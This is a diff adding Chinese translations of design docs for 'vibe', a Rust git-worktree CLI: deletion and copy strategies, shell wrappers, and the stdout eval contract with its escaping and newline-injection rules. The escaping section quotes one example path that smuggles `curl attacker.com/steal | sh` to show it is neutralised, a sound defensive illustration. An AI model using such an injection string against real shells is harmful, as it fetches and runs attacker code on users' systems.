+    A[fast_remove_directory] --> B{Native Trash Available?}
+    B -->|Yes| C[Native Trash Module]
+    B -->|No| D{macOS?}
+
+    C --> E[XDG Trash / Finder Trash]
+
+    D -->|Yes| F[AppleScript Fallback]
+    D -->|No| G{Same Filesystem?}
+
+    F --> E
+
+    G -->|Yes| H[Rename to /tmp]
+    G -->|No| I[Rename to Parent Dir]
+
+    H --> J[Background Delete]
+    I --> J
+```
+
+### 回收站处理
+
+| 方式                    | 平台                 | 说明                                     |
+| ----------------------- | -------------------- | ---------------------------------------- |
+| Native Trash            | Rust 二进制文件      | 使用 trash crate                         |
+| AppleScript             | macOS 上的 Rust 二进制文件 | 通过 osascript 调用 Finder 的回退方案 |
+| /tmp + Background       | Linux（无桌面环境）  | 移动到 /tmp 后在后台删除                 |
+| Parent Dir + Background | 跨设备               | 面向网络挂载的同文件系统回退方案         |
+
+## 上下文与依赖注入
+
+Vibe 通过 AppContext 采用了简洁的依赖注入模式。
+
+```mermaid
+flowchart LR
+    subgraph AppContext
+        R[Runtime]
+        C[Config]
+        S[Settings]
+    end
+
+    subgraph Commands
+        START[start]
+        CLEAN[clean]
+        TRUST[trust]
+    end
+
+    AppContext --> START
+    AppContext --> CLEAN
+    AppContext --> TRUST
+```
+
+### 优势
+
+1. **可测试性**：可以使用 mock 上下文对命令进行测试
+2. **灵活性**：无需修改命令逻辑即可替换运行时
+3. **配置访问**：在整个应用中都能访问项目配置和用户设置
+
+## Shell 包装器架构
+
+该协议的现行规范性说明请参见 [The stdout Eval Contract](specifications/eval-contract.zh.md)。
+
+Vibe 使用 shell 包装器模式，以便在命令执行后切换目录。
+
+### UNIX 进程模型的约束
+
+在类 UNIX 操作系统中，子进程无法修改父进程的环境（包括当前工作目录）。这是操作系统基本的安全与进程隔离机制。
+
+```mermaid
+flowchart TB
+    subgraph Shell["Shell (Parent Process)"]
+        CWD["Current Directory: /projects/myapp"]
+    end
+    subgraph Vibe["vibe start (Child Process)"]
+        Create["Create worktree"]
+        Output["Output: cd '/path/to/worktree'"]
+    end
+    Shell -->|spawn| Vibe
+    Vibe -.->|cannot modify directly| CWD
+    Output -->|eval in shell context| CWD
+```
+
+### Vibe 的解决方案
+
+1. `vibe start` 命令创建 worktree 并输出一条 shell 命令（例如 `cd '/path/to/worktree'`）
+2. shell 包装器函数捕获该输出
+3. 包装器在父 shell 的上下文中对该输出求值
+4. 由此，目录切换在用户的 shell 中生效
+
+### Shell 函数的设置
+
+用户需要在 shell 配置文件（`~/.bashrc` 或 `~/.zshrc`）中添加以下函数：
+
+```bash
+# Add to ~/.bashrc or ~/.zshrc
+vibe() { eval "$(command vibe "$@")"; }
+```
+
+这样便定义了一个包装 `vibe` 命令的 shell 函数，并在合适的时候对其输出求值。
+
+对于 Vibe 自身的开发者，可以直接从 Cargo workspace 运行该二进制文件：
+
+```bash
+cargo run --manifest-path rust/Cargo.toml -p vibe -- <command>
+```
+
+### 采用相同模式的同类工具
+
+其他需要修改父 shell 环境的工具也采用了类似的模式：
+
+| 工具   | 用途                            |
+| ------ | ------------------------------- |
+| nvm    | Node.js 版本管理器 - 修改 PATH  |
+| rbenv  | Ruby 版本管理器 - 修改 PATH     |
+| direnv | 目录级别的环境变量              |
+| pyenv  | Python 版本管理器 - 修改 PATH   |

--- a/docs/specifications/clean-strategies.ja.md
+++ b/docs/specifications/clean-strategies.ja.md
@@ -1,4 +1,4 @@
-> 🇺🇸 [English](./clean-strategies.md)
+> 🇺🇸 [English](./clean-strategies.md) | 🇨🇳 [简体中文](./clean-strategies.zh.md)
 
 # Clean Strategies
 

--- a/docs/specifications/clean-strategies.md
+++ b/docs/specifications/clean-strategies.md
@@ -1,4 +1,4 @@
-> 🇯🇵 [日本語版](./clean-strategies.ja.md)
+> 🇯🇵 [日本語版](./clean-strategies.ja.md) | 🇨🇳 [简体中文](./clean-strategies.zh.md)
 
 # Clean Strategies
 

--- a/docs/specifications/clean-strategies.zh.md
+++ b/docs/specifications/clean-strategies.zh.md
@@ -1,0 +1,195 @@
+> 🇺🇸 [English](./clean-strategies.md) | 🇯🇵 [日本語版](./clean-strategies.ja.md)
+
+# Clean Strategies
+
+> **历史说明：** 本文所述的 TypeScript 实现（`packages/core`，例如 `fast-remove.ts`）已在 Rust 移植的 Phase 6 中移除。vibe 现在是单一的 Rust 二进制文件，clean 逻辑位于 `rust/crates/vibe-core`（原生回收站支持位于 `rust/crates/vibe-native`）。本文档作为设计历史保留。
+
+vibe 在 `vibe clean` 命令中采用了称为 “Trash Strategy（回收站策略）” 的快速删除策略，通过即时响应来提升用户体验。
+
+## 什么是 Trash Strategy？
+
+Trash Strategy 不会立即删除目录，而是先将其移动到临时位置。真正的删除在后台进行，因此 CLI 能够立刻把控制权交还给用户。
+
+**优势：**
+
+- 近乎瞬时的响应（仅执行 rename 操作）
+- 更好的用户体验（无需等待大目录删除完成）
+- 快速删除失败时可安全回退到标准删除
+
+## 策略概览
+
+| 策略         | 实现方式                | macOS        | Linux            | Windows              |
+| ------------ | ----------------------- | ------------ | ---------------- | -------------------- |
+| **Trash**    | 原生回收站 + 回退方案   | Finder Trash | XDG Trash / /tmp | 回收站 / %TEMP%      |
+| **Standard** | git worktree remove     | 支持         | 支持             | 支持                 |
+
+### 原生回收站支持
+
+vibe 通过 Rust 二进制文件使用 [trash crate](https://lib.rs/crates/trash) 来提供跨平台的回收站支持：
+
+- **macOS**：Finder Trash（与之前相同）
+- **Linux**：XDG Trash (`~/.local/share/Trash`)，遵循 [FreeDesktop.org 规范](https://specifications.freedesktop.org/trash-spec/trashspec-latest.html)
+- **Windows**：回收站
+
+移动到 XDG Trash 的文件会出现在桌面环境的回收站文件夹中（GNOME Files、Dolphin、Nautilus 等），并且可以还原。
+
+## 各平台的具体行为
+
+### macOS
+
+1. **首选 (Rust)**：通过 `trash` crate 移动到 Finder Trash
+   - 内部使用 Rust 的 `trash` crate
+   - 会出现在 Finder 的回收站文件夹中
+2. **回退 (Rust/macOS)**：通过 AppleScript (`osascript`) 移动到 Finder Trash
+3. **回退**：若两者都失败（例如 SSH 会话中），则回退到 /tmp + 后台删除
+
+### Linux
+
+1. **首选 (Rust)**：通过 `trash` crate 移动到 XDG Trash
+   - 使用实现了 [XDG Trash 规范](https://specifications.freedesktop.org/trash-spec/trashspec-latest.html)的 Rust `trash` crate
+   - 文件被移动到 `~/.local/share/Trash/files/`
+   - 元数据保存在 `~/.local/share/Trash/info/`
+   - 会出现在桌面文件管理器的回收站中（GNOME Files、Dolphin、Nautilus 等）
+   - 可从文件管理器中还原
+2. **回退**：若原生回收站失败（SSH 会话、无桌面环境）：
+   - rename 到 `/tmp/.vibe-trash-{timestamp}-{uuid}` + `nohup rm -rf`
+   - `/tmp` 会在重启时被清理
+   - `nohup` 确保父进程退出后删除仍继续进行
+3. **回退**：若发生跨设备错误（EXDEV），则改为 rename 到父目录
+
+### Windows
+
+1. **首选**：通过 Rust 的 `trash` crate 移动到回收站
+2. **回退**：移动到 `%TEMP%` 目录 + 通过 `cmd /c rmdir /s /q` 在后台删除
+
+## 策略详解
+
+### Trash Strategy
+
+Trash Strategy 的工作方式是：先将目标目录 rename 到一个临时位置，然后启动一个分离的后台进程来执行真正的删除。
+
+**命名规则：** `.vibe-trash-{timestamp}-{uuid}`
+
+示例：`.vibe-trash-1705123456789-a1b2c3d4`
+
+**处理流程：**
+
+1. 从 worktree 读取 `.git` 文件的内容（git worktree 清理时需要）
+2. 将目录移动到回收站位置（瞬时的 rename 操作）
+3. 重新创建一个包含原 `.git` 文件的空目录
+4. 对该空目录执行 `git worktree remove --force`（非常快）
+5. 启动一个分离的后台进程来删除已移入回收站的目录
+
+**清理机制：**
+
+`cleanup_stale_trash()` 函数会扫描并删除残留的 `.vibe-trash-*` 目录，范围包括：
+
+- 被删除 worktree 的父目录
+- 系统临时目录
+
+该清理会在每次 clean 操作后自动执行。
+
+**实现文件：** `rust/crates/vibe-core/src/fast_remove.rs`
+
+### Standard Strategy
+
+使用标准的 `git worktree remove` 命令。当 Trash Strategy 失败或被禁用时，作为回退方案使用。
+
+**实现文件：** `rust/crates/vibe-core/src/commands/clean.rs`
+
+## 配置
+
+### User Settings (~/.config/vibe/settings.json)
+
+```json
+{
+  "clean": {
+    "fast_remove": true
+  }
+}
+```
+
+| 设置项              | 类型    | 默认值  | 说明                       |
+| ------------------- | ------- | ------- | -------------------------- |
+| `clean.fast_remove` | boolean | `true`  | 启用/禁用 Trash Strategy   |
+
+### Project Config (vibe.toml)
+
+```toml
+[clean]
+delete_branch = false
+
+[hooks]
+pre_clean = ["npm run clean"]
+post_clean = ["echo 'Cleanup complete'"]
+```
+
+| 设置项                | 类型     | 默认值  | 说明                            |
+| --------------------- | -------- | ------- | ------------------------------- |
+| `clean.delete_branch` | boolean  | `false` | 删除 worktree 后一并删除分支    |
+| `hooks.pre_clean`     | string[] | `[]`    | 清理前执行的命令                |
+| `hooks.post_clean`    | string[] | `[]`    | 清理后执行的命令                |
+
+## 文件结构
+
+```
+rust/crates/
+├── vibe-native/
+│   └── src/lib.rs        # 通过 trash crate 实现的跨平台回收站绑定
+└── vibe-core/src/
+    ├── fast_remove.rs    # Trash Strategy 实现
+    │   ├── is_fast_remove_supported()
+    │   ├── trash_name()
+    │   ├── move_to_system_trash()        # 原生回收站 + 平台回退方案
+    │   ├── move_to_macos_trash_via_osascript()
+    │   ├── spawn_background_delete()
+    │   ├── fast_remove_directory()
+    │   └── cleanup_stale_trash()
+    └── commands/
+        └── clean.rs      # Clean 命令实现
+```
+
+**函数说明：**
+
+| 函数                                  | 说明                            |
+| ------------------------------------- | ------------------------------- |
+| `is_fast_remove_supported()`          | 检查是否支持快速删除            |
+| `trash_name()`                        | 生成唯一的回收站目录名          |
+| `move_to_system_trash()`              | 原生回收站 + 平台专属回退方案   |
+| `move_to_macos_trash_via_osascript()` | Rust macOS Finder Trash 回退方案 |
+| `spawn_background_delete()`           | 分离的后台删除                  |
+| `fast_remove_directory()`             | 快速删除的主函数                |
+| `cleanup_stale_trash()`               | 清理残留的回收站目录            |
+
+## 策略选择机制
+
+clean 命令会根据用户设置自动选择合适的策略：
+
+```rust
+// From rust/crates/vibe-core/src/commands/clean.rs
+let should_fast = use_fast_remove && is_fast_remove_supported();
+
+if should_fast {
+    let result = fast_remove_directory(
+        deps.io,
+        &deps.native,
+        &deps.spawner,
+        &deps.clock,
+        &deps.random,
+        worktree_path,
+        opts,
+    );
+
+    if result.success {
+        // Recreate the empty worktree marker and let Git unregister it.
+        cleanup_stale_trash(deps.io, &deps.spawner, &parent);
+        return Ok(());
+    }
+
+    // Fall through to Standard Strategy.
+}
+
+// Standard Strategy: git worktree remove
+```
+
+如果 Trash Strategy 因任何原因失败（权限、跨设备错误等），系统会自动回退到 Standard Strategy。

--- a/docs/specifications/copy-strategies.ja.md
+++ b/docs/specifications/copy-strategies.ja.md
@@ -1,4 +1,4 @@
-> 🇺🇸 [English](./copy-strategies.md)
+> 🇺🇸 [English](./copy-strategies.md) | 🇨🇳 [简体中文](./copy-strategies.zh.md)
 
 # コピー戦略
 

--- a/docs/specifications/copy-strategies.md
+++ b/docs/specifications/copy-strategies.md
@@ -1,4 +1,4 @@
-> 🇯🇵 [日本語版](./copy-strategies.ja.md)
+> 🇯🇵 [日本語版](./copy-strategies.ja.md) | 🇨🇳 [简体中文](./copy-strategies.zh.md)
 
 # Copy Strategies
 

--- a/docs/specifications/copy-strategies.zh.md
+++ b/docs/specifications/copy-strategies.zh.md
@@ -1,0 +1,138 @@
+> 🇺🇸 [English](./copy-strategies.md) | 🇯🇵 [日本語版](./copy-strategies.ja.md)
+
+# 复制策略
+
+> **历史说明：** 本文所述的 TypeScript 实现（Deno API / `packages/core`）已在 Rust 移植的 Phase 6 中移除。vibe 现在是单一的 Rust 二进制文件，复制逻辑位于 `rust/crates/vibe-core`（原生 CoW 位于 `rust/crates/vibe-native`）。本文档作为设计历史保留。
+
+vibe 在目录复制中利用 Copy-on-Write (CoW)，以实现快速且节省磁盘空间的操作。
+
+## 什么是 Copy-on-Write (CoW)？
+
+CoW 是一种文件系统层面的优化技术。复制文件时，只复制元数据而非实际数据。只有在数据真正被修改时才会执行复制。
+
+**优势：**
+
+- 复制耗时接近于零（仅涉及元数据操作）
+- 减少磁盘占用（在被修改之前数据是共享的）
+
+## 策略概览
+
+| 策略            | 实现方式      | macOS (APFS)   | Linux (Btrfs/XFS) |
+| --------------- | ------------- | -------------- | ----------------- |
+| **NativeClone** | 直接 FFI 调用 | 文件/目录      | 仅文件            |
+| **Clone**       | cp 命令       | 文件/目录      | 文件/目录         |
+| **Rsync**       | rsync 命令    | 回退方案       | 回退方案          |
+| **Standard**    | Deno API      | 最终回退方案   | 最终回退方案      |
+
+## 各平台的优先级顺序
+
+### macOS (APFS)
+
+```
+Directory copy: NativeClone → Clone → Rsync → Standard
+File copy: Standard (Deno.copyFile)
+```
+
+### Linux (Btrfs/XFS)
+
+```
+Directory copy: Clone → Rsync → Standard
+File copy: Standard (Deno.copyFile)
+```
+
+> **注意：** 在 Linux 上会跳过 `NativeClone`，因为它不支持目录克隆。
+
+## 策略详解
+
+### NativeClone
+
+通过 FFI 直接调用系统调用。由于没有进程创建的开销，这是最快的方案。
+
+| 平台  | 系统调用        | 文件 | 目录   |
+| ----- | --------------- | ---- | ------ |
+| macOS | `clonefile()`   | 支持 | 支持   |
+| Linux | `FICLONE ioctl` | 支持 | 不支持 |
+
+**实现文件：**
+
+- `packages/core/src/utils/copy/strategies/native-clone.ts`
+- `packages/core/src/utils/copy/ffi/darwin.ts` (macOS)
+- `packages/core/src/utils/copy/ffi/linux.ts` (Linux)
+
+### Clone
+
+使用 `cp` 命令进行 CoW 复制。
+
+| 平台  | 命令（文件）        | 命令（目录）           |
+| ----- | ------------------- | ---------------------- |
+| macOS | `cp -c`             | `cp -cR`               |
+| Linux | `cp --reflink=auto` | `cp -r --reflink=auto` |
+
+**实现文件：** `packages/core/src/utils/copy/strategies/clone.ts`
+
+### Rsync
+
+使用 `rsync` 命令。虽然不使用 CoW，但在增量复制方面表现出色。
+
+**实现文件：** `packages/core/src/utils/copy/strategies/rsync.ts`
+
+### Standard
+
+使用 Deno 的标准 API（`Deno.copyFile`）。这是在所有平台上都可用的最终回退方案。
+
+**实现文件：** `packages/core/src/utils/copy/strategies/standard.ts`
+
+## 文件系统要求
+
+CoW 需要文件系统的支持。
+
+| 平台  | 支持       | 不支持 |
+| ----- | ---------- | ------ |
+| macOS | APFS       | HFS+   |
+| Linux | Btrfs, XFS | ext4   |
+
+在不支持的文件系统上，会自动使用 Standard 策略作为回退方案。
+
+## 权限要求
+
+```bash
+--allow-ffi   # Required for NativeClone strategy
+--allow-run   # Required for Clone/Rsync strategies (cp, rsync commands)
+```
+
+## 文件结构
+
+```
+packages/core/src/utils/copy/
+├── index.ts           # CopyService 主类
+├── types.ts           # 接口定义
+├── detector.ts        # 能力检测
+├── validation.ts      # 路径校验（防止命令注入）
+├── ffi/
+│   ├── types.ts       # FFI 类型定义与错误码
+│   ├── darwin.ts      # macOS clonefile FFI
+│   ├── linux.ts       # Linux FICLONE FFI
+│   └── detector.ts    # FFI 可用性检查
+└── strategies/
+    ├── native-clone.ts  # NativeClone 策略
+    ├── clone.ts         # Clone 策略
+    ├── rsync.ts         # Rsync 策略
+    ├── standard.ts      # Standard 策略
+    └── index.ts         # 导出
+```
+
+## 策略选择机制
+
+`CopyService` 会在首次执行目录复制操作时自动选择最优策略，并缓存该结果。
+
+```typescript
+// From packages/core/src/utils/copy/index.ts
+async getDirectoryStrategy(): Promise<CopyStrategy> {
+  // 1. Use NativeClone if available and supports directory cloning
+  // 2. Use Clone if available
+  // 3. Use Rsync if available
+  // 4. Fall back to Standard
+}
+```
+
+如果某个策略在执行过程中失败，会自动回退到 Standard 策略。

--- a/docs/specifications/eval-contract.ja.md
+++ b/docs/specifications/eval-contract.ja.md
@@ -1,4 +1,4 @@
-> 🇺🇸 [English](./eval-contract.md)
+> 🇺🇸 [English](./eval-contract.md) | 🇨🇳 [简体中文](./eval-contract.zh.md)
 
 # The stdout Eval Contract
 

--- a/docs/specifications/eval-contract.md
+++ b/docs/specifications/eval-contract.md
@@ -1,4 +1,4 @@
-> 🇯🇵 [日本語版](./eval-contract.ja.md)
+> 🇯🇵 [日本語版](./eval-contract.ja.md) | 🇨🇳 [简体中文](./eval-contract.zh.md)
 
 # The stdout Eval Contract
 

--- a/docs/specifications/eval-contract.zh.md
+++ b/docs/specifications/eval-contract.zh.md
@@ -1,0 +1,237 @@
+> 🇺🇸 [English](./eval-contract.md) | 🇯🇵 [日本語版](./eval-contract.ja.md)
+
+# The stdout Eval Contract
+
+> **状态：Normative（规范性）。** 与本目录中其他历史性规格文档不同，本文档描述的是**当前的** Rust 实现，是 shell eval 协议的 single source of truth。代码与规格必须一同变更。
+
+**MUST** / **MUST NOT** 这两个关键词按 RFC 2119 的含义使用，它们标记的是实现以及今后任何变更都必须保持的不变式。
+
+## 1. 概述
+
+子进程无法改变父 shell 的当前工作目录。`vibe start` 作为用户 shell 的子进程运行，因此无法代替 shell 执行 `cd`。取而代之的是，shell 的包装函数在父 shell 的上下文中对二进制文件的 stdout 求值（eval）。
+
+这使得 **stdout 成为可执行的 shell 代码**，即 *eval 通道*。所有面向人类阅读的内容都输出到 stderr，即 *human 通道*。
+
+```mermaid
+sequenceDiagram
+    participant U as User
+    participant W as Shell wrapper (parent shell)
+    participant V as vibe (child process)
+    U->>W: vibe start feature-x
+    W->>V: spawn `command vibe start feature-x`
+    V-->>W: stderr: progress, warnings, errors (shown directly)
+    V-->>W: stdout: cd '/path/to/worktree'
+    W->>W: eval stdout in the parent shell
+    Note over W: cwd is now /path/to/worktree
+```
+
+由此可见：混入 stdout 的任何一个字节都会被用户的 shell 执行。下面的契约正是为了从结构上杜绝这种可能性而存在的。
+
+## 2. 术语
+
+| 术语              | 含义                                                                                             |
+| ----------------- | ------------------------------------------------------------------------------------------------ |
+| **eval 通道**     | stdout。由包装函数原样接收，并作为 shell 代码执行。                                                |
+| **human 通道**    | stderr。进度、日志、警告、错误、`--help`、`--version`。绝不会被 eval。                             |
+| **包装函数**      | 由 `vibe shell-setup` 输出的 shell 函数，负责运行二进制文件并对其 stdout 求值。                     |
+| **子二进制文件**  | 真正的 `vibe` 可执行文件。为绕过包装函数，以 `command vibe` / `^vibe` / `vibe.exe` 的形式调用。      |
+| **`Outcome`**     | 命令处理函数返回的值（`rust/crates/vibe-core/src/commands/mod.rs`），描述二进制文件应向 stdout 写入什么（或不写入任何内容）。 |
+| **dialect（方言）** | 由内部全局标志 `--eval-dialect <posix\|nu\|powershell>` 选择的输出语法变体。Posix 是默认值（标志缺省时始终使用），也是保持线格式兼容的传统语法。 |
+
+## 3. 各 shell 的包装函数
+
+由 `rust/crates/vibe-core/src/commands/shell_setup.rs` 的 `shell_function` 输出，每行一条，各自以一个 `\n` 结尾。
+
+| Shell        | 包装函数文本（逐字节精确）                                                        |
+| ------------ | -------------------------------------------------------------------------------- |
+| bash, zsh    | `vibe() { eval "$(command vibe "$@")"; }`                                         |
+| fish         | `function vibe; eval (command vibe $argv); end`                                   |
+| nushell      | `def --env --wrapped vibe [...args] { let out = (^vibe --eval-dialect nu ...$args); for line in ($out \| lines) { if ($line \| str starts-with "__VIBE_CD__") { cd ($line \| str replace "__VIBE_CD__" "") } else { print $line } } }` |
+| powershell   | `function vibe { $out = & vibe.exe --eval-dialect powershell @args; if ($out) { Invoke-Expression ($out -join "`n") } }` |
+
+- 包装函数文本与补全脚本的输出跨版本必须保持逐字节一致（**MUST**）。已被加载进用户 rc 文件中的包装函数在升级时不会重新生成，它们依赖于精确的字节序列。nushell 与 powershell 这两行只在引入 `--eval-dialect` 的那个版本中变更过一次，该例外的记录见 §9。
+- **bash、zsh、fish 的包装函数未发生变化**，它们不传递 `--eval-dialect`，依赖 Posix 默认值。
+- nushell 与 powershell 的包装函数会传递内部标志 `--eval-dialect`。与 `--claude-code-worktree-hook` 一样，它是内部标志，不得出现在生成的补全中（**MUST**，见 `rust/crates/vibe/src/cli.rs` 的 `INTERNAL_FLAGS_NOT_EXPOSED`）。
+- nushell 包装函数要求 **nu ≥ 0.83**（从该版本起 `str replace` 默认按字面量匹配）。它必须使用 `for` 而非 `each`（**MUST**）：在 nushell 中，`each` 闭包会丢弃环境变更，因此 `each` 内部的 `cd` 无法传递到调用方。
+- nushell 包装函数必须声明为 `--wrapped`（**MUST**）。否则 nu 会在*解析*阶段依据签名解析标志，任何带标志的 `vibe` 调用（`vibe start -b`、`vibe clean --force` 等）都会在函数体执行之前失败。`--wrapped` 会将未知标志原样送入 `...args` 这个 rest 参数，正是它让标志转发得以成立。
+- `--with-completion` 会追加一段补全脚本（仅限 fish 与 zsh）以及末尾的 `\n`。其他 shell 则为 `VibeError::Configuration`（退出码 1）。
+- 无法识别的 `--shell` / `$SHELL` 取值同样是 `VibeError::Configuration`（退出码 1），而不是 `Argument` 错误。
+
+## 4. 规范规则：stdout
+
+### 4.1 唯一的写入点
+
+- `rust/crates/vibe/src/eval_output.rs::write_outcome` 是生产代码中**唯一**向 stdout 写入的函数。
+- 它仅在 `rust/crates/vibe/src/main.rs` 中 `dispatch` 的 `Ok` 分支被调用**恰好一次**。
+- 生产代码中任何其他的 `println!`、`print!`、`std::io::stdout()` 或 `dbg!` 都属于缺陷。`vibe-core` 中的命令处理函数不得进行输出（**MUST NOT**），它们返回一个 `Outcome`，由二进制文件决定如何处理。
+- 该规则并非仅停留在文档层面，而是**通过机制强制执行**：clippy 的 `print_stdout` 与 `dbg_macro` 在整个 workspace 中被 deny，`rust/clippy.toml` 将 `std::io::stdout` 列入 disallowed-methods。workspace 中唯一的 `#[allow]` 位于 `rust/crates/vibe/src/eval_output.rs`。在其他任何位置新增 stdout 写入都会导致 `just check-rust` / CI 失败。
+- 若 `write_outcome` 失败（参见换行符防护），错误会报告到 stderr 并以非零状态退出进程，stdout 上不会写入任何内容。
+
+### 4.2 按 `Outcome` 变体划分的 stdout 语法
+
+| 构造函数                   | 输出到 stdout 的内容                                  | 使用者                                              |
+| -------------------------- | ----------------------------------------------------- | --------------------------------------------------- |
+| `Outcome::none()`          | 不输出任何内容（零字节）                                | `config`、`verify`、`trust`、`untrust`、`upgrade`、dry run、hook 模式的 `clean` |
+| `Outcome::cd(path)`        | 恰好一行，采用所选 dialect 的语法（§4.3）               | `start`、`scratch`、`jump`、`rename`、`clean`、`home` |
+| `Outcome::stdout(text)`    | 原样输出 `text`，可以是多行，末尾换行符由文本自身携带    | `shell-setup`（包装函数 + 补全）                     |
+| `Outcome::stdout_path(p)`  | 仅输出裸路径 `p`，**不带**末尾换行符                    | `start --claude-code-worktree-hook`                  |
+
+补充规则：
+
+- `cd_path` 与 `stdout` 在**结构上互斥**：每个构造函数至多设置其中之一。`write_outcome` 中带有 `debug_assert!`，从而在未来某个构造函数同时设置两者时能够被捕获，而不是悄悄丢弃 `stdout`。
+- `write_outcome` 必须拒绝包含 `\n` 或 `\r` 的 `cd_path`，返回错误而非输出（**MUST**）。换行符会终止这唯一的 `cd` 行，使攻击者可控的路径得以向 eval 注入第二条命令。
+- `Outcome::stdout_path` 在**构造时**施加同样的 `\n` / `\r` 防护并返回 `Err`：worktree 路径可能派生自用户的 `path_script`，就此用途而言属于不可信输入。
+- `Outcome::stdout` 仅用于**可信的、手工构建的载荷**（包装函数与补全脚本，它们理应包含换行符）。不得向其传入不可信文本（**MUST NOT**）。
+
+### 4.3 Dialect：`cd` 的语法
+
+内部全局标志 `--eval-dialect <posix|nu|powershell>` 选择 `Outcome::cd` 所使用的语法。可接受的别名为 `nu` / `nushell`、`powershell` / `pwsh`。
+
+| Dialect                           | `Outcome::cd(path)` 的 stdout                          |
+| --------------------------------- | ------------------------------------------------------- |
+| Posix（默认，无标志）              | `cd '<经 '\'' 转义的路径>'` + `\n`                        |
+| Nushell（`nu`、`nushell`）        | `__VIBE_CD__<原始路径>` + `\n`                           |
+| Powershell（`powershell`、`pwsh`）| `Set-Location -LiteralPath '<经 '' 转义的路径>'` + `\n`    |
+
+规范规则：
+
+- 当 `--eval-dialect` 缺省时，输出必须与 Posix 语法逐字节一致（**MUST**）。默认路径就是传统的线格式，不允许发生偏移。
+- dialect **只**影响 `cd` 结果。`Outcome::none()`、`Outcome::stdout(text)`、`Outcome::stdout_path(p)` 是 **dialect 无关**的：`shell-setup` 的输出、hook 路径以及空输出的情形在任何 dialect 下都是相同的字节序列。
+- 针对 `cd_path` 的 `\n` / `\r` 防护（§4.2）在 dialect 分派**之前**生效，因此任何可能破坏单行不变式的路径都不会到达任何一个 dialect。
+- nushell dialect 将路径作为**数据而非代码**输出：`__VIBE_CD__` 哨兵前缀框定了一条原始且未加引号的路径，包装函数剥去前缀后把剩余部分作为字符串值交给 `cd`。该行中没有任何部分会被解析为 nushell 源代码。
+
+## 5. 规范规则：stderr
+
+- 所有面向人类的输出都必须写入 stderr（**MUST**）：`log` / `verbose_log` / `success_log` / `warn_log` / `error_log`（`rust/crates/vibe-core/src/output.rs`）、进度渲染（`ProgressDrawTarget::stderr()`）、交互式提示、clap 的 `--help` 与解析错误，以及自定义的 `--version` 输出块。
+- clap 的错误在 `main.rs` 中被显式写入 stderr（否则 clap 会把 `--help` 输出到 stdout，而包装函数会执行它）。
+- 生命周期 hook 的输出（`rust/crates/vibe-core/src/hooks.rs`）：没有进度跟踪器时，hook 的 **stdout 会被转发到 stderr**；有跟踪器时则被抑制，以保持界面整洁。失败的 hook 始终会显示其 stderr。在任何配置下，hook 的输出都不得抵达进程的 stdout（**MUST NOT**）。
+- `vibe-core` 完全不得向 stdout 写入（**MUST NOT**），它根本没有 stdout 的 seam。
+
+## 6. 转义
+
+`rust/crates/vibe-core/src/shell.rs`：
+
+- `shell_escape(value)` 将每个 `'` 替换为 `'\''`（闭合引号 → 转义后的字面引号 → 重新开启引号）。`$`、反引号和双引号在单引号内是惰性的，因此原样保留。
+- `escape_shell_path` 是面向路径的别名。
+- `format_cd_command(path)` 生成 `cd '<escaped>'`。
+- 这些函数的输出必须保持逐字节稳定（**MUST**）。该转义正是对 shell 输出注入的缓解措施，而且已安装的包装函数依赖于精确的语法。
+
+示例：`/tmp/x'; curl attacker.com/steal | sh; echo '` 会变成 `cd '/tmp/x'\''; curl attacker.com/steal | sh; echo '\'''`，即单个惰性的 `cd` 参数。
+
+每个 dialect 都按其所属 shell 自身的规则进行引用：
+
+| Dialect    | 转义方式                                                                                    |
+| ---------- | -------------------------------------------------------------------------------------------- |
+| Posix      | `'` → `'\''`（闭合引号 → 转义后的字面引号 → 重新开启引号）；整条路径以单引号包裹。 |
+| Powershell | `'` → `''`（PowerShell 通过将单引号加倍来转义单引号字符串内部的单引号）。`Set-Location` 使用 `-LiteralPath` 而非 `-Path`，因为 `-Path` 会将 `[`、`]`、`*`、`?` 解释为通配符，而它们都是路径中合法的字符。 |
+| Nushell    | **不做转义。** 路径在 `__VIBE_CD__` 哨兵之后原样输出。nushell 的单引号字符串完全不支持转义序列，因此根本不存在可转义的目标；哨兵框定使路径成为纯数据，从而消除了转义的必要。 |
+
+### 6.1 已知限制与历史记录
+
+在 dialect 机制引入之前，nushell 与 powershell 的包装函数是坏的。之所以在此明确说明，是因为本文档的早期版本给出了相反的表述。
+
+- **nushell —— 旧包装函数从未真正工作过。** `... | each { |line| nu -c $line }` 会为每一行启动一个**子** `nu` 进程；子进程中的 `cd` 无法改变调用方的目录，因此无论是否加引号，任何路径都不会生效。此外，POSIX 的 `'\''` 惯用法在 nushell 中是**解析错误**：nushell 的单引号字符串完全不支持转义序列，而且 nushell 没有 `eval`。它还完全无法转发标志：旧签名不是 `--wrapped`，因此 nu 在解析阶段就解析标志，任何带标志的调用（`vibe start -b`、`vibe clean --force` 等）都会在函数体运行之前被拒绝。以上已在 nushell 0.113.1 上通过实测确认。此前"不含单引号的普通路径在全部五种 shell 上均能正确工作"这一说法，**对 nushell 而言是错误的**：在 nushell 上没有任何东西能工作——加引号的路径不行，普通路径不行，标志也不行。
+- **powershell —— 旧包装函数因两个彼此独立的原因而损坏。** `Invoke-Expression (& vibe.exe $args)` 会按 PowerShell 的引用规则解释经 POSIX 转义的行，因此任何含单引号的路径都会被错误处理；另外，只要二进制文件没有产生 stdout 输出（所有 `Outcome::none()` 的命令），`Invoke-Expression` 就会以空参数被调用并抛出 *"Cannot bind argument to parameter 'Command'"*。
+
+这两个问题都已由 dialect 机制解决：nushell 不再把该行当作代码求值，powershell 获得了属于自己的引用方言，而且新的 powershell 包装函数会先用 `if ($out)` 做防护再执行调用。
+
+尚存的限制：
+
+- **包装函数不会被自动重新生成。** 把旧的 nushell 或 powershell 代码片段粘贴进 rc 文件的用户，在重新执行 `vibe shell-setup`（或从文档重新粘贴片段）之前，仍会保持旧的、有缺陷的行为。这是有意为之的设计：vibe 绝不会改写用户的 shell 配置。
+- Posix 系包装函数（bash、zsh、fish）的字节序列未发生变化，因此不会影响任何原本可用的配置。
+
+## 7. 相邻协议：Claude Code worktree hook（stdin JSON）
+
+`start` 与 `clean` 接受 `--claude-code-worktree-hook`，这是面向 Claude Code 而非人类的内部标志。它通过 `rust/crates/vibe/src/cli.rs` 中的 `INTERNAL_FLAGS_NOT_EXPOSED` 从生成的补全中排除。
+
+### 7.1 请求（stdin）
+
+由 `rust/crates/vibe-core/src/stdin.rs` 读取，这是不可信输入的边界。
+
+| 规则                                                                                              |
+| ------------------------------------------------------------------------------------------------- |
+| 载荷必须是单个 JSON **对象**（**MUST**）；数组、标量和 `null` 都会被拒绝。                          |
